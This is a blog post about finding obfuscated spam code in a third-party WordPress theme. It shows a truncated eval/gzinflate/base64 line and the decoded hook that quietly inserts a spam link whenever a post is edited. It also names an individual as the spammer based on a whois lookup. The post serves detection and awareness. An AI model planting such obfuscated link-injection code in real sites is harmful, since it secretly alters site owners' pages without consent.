Found - Wordpress Spam Virus in Theme files

Almost a month ago, I was helping my good buddy Beals get his Wordpress website set up. On looking close, I noticed something a little weird in a theme he had found(NOT Wordpress proper, to be clear):

D-69-91-134-36:black-abstract-20 tjohnson$ ls -alh *
-rw-r--r--  1 tjohnson staff  528 2008-07-24 08:35 404.php
-rw-r--r--  1 tjohnson staff 3.9K 2008-07-24 08:35 comments.php
-rw-r--r--  1 tjohnson staff 8.0K 2008-10-22 20:44 footer.php
-rw-r--r--  1 tjohnson staff  871 2008-10-22 10:10 functions.php
[more removed here]

As you can see, the footer and functions files are both modified much more recently than every other file, which seemed strange to me. So I took a look at the file:

[some basic stuff removed]
eval(gzinflate(base64_decode('pZ..[much removed here, it was about 300 bytes].f1HKQRx+ecX+wY=')));

Hrmm… that doesn’t seem right. Why would someone base64 some stuff? (footer.php had MUCH longer string, about 8 kilobytes). I wrote a new file that printed it out instead of evaluating it, and got this(edited the website out.. they won’t get my link):

add_action("edit_post","insert_theme_link");
function insert_theme_link() {
	global $wpdb;
	if($wpdb->get_var("SELECT COUNT(link_id) FROM $wpdb->links WHERE link_url='http://nefariouswebsite.com/'")==0)
		wp_insert_link(array("link_name" => "Online University Courses", "link_url" => "http://nefariouswebsite.com/" ));
}

So this is a relatively well-behaved little Wordpress ‘virus’(it /needs/ your website to stay running), but still pretty uncalled for, and impossible to remove without editing the code. More fundamentally, it would not have been hard to have the code do something more devious.

An analysis of the footer.php file ended up taking almost 70 base64 decodes(again, !) to finally get to the meat of it, which ended up just being the footer attribution to the host of the (very dishonest) wordpress template repository that Beals found the theme at.

On a whim, I decided to whois the domain the link went to. Turns out it’s owned by someone in New Jersey named Douglas Petrie. One Douglas Petrie appears to write TV stuff, this cutie seems to write spamming programs, and has been since at least 2006: Spamhuntress: Doug Petrie’s domains in spamrun. And to think, I was going to politely ask him if he knew his company was doing this stuff. What a jerk.

In terms of positive lessons/actions to take out of this whole thing:

• Users: Don’t download themes from random places and run them if you don’t know what you’re doing.
• Wordpress Devs: Perhaps Wordpress should incorporate a quick scan/warning for eval statements? Sure, most people probably don’t read through their theme files closely to enough notice the code even if it was sitting in the open, but at least this way Wordpress could put a giant ‘Your theme is totally sketch, dude’ warning when you tried to use it.

How common is this sort of thing? I’ve seen a couple of these sort of posts around, but not too many straight-out warnings about them. Also, a lot of them seem to revolve around plugins, not themes.

EDIT: Also, nefariouswebsite.com would be awesome to own.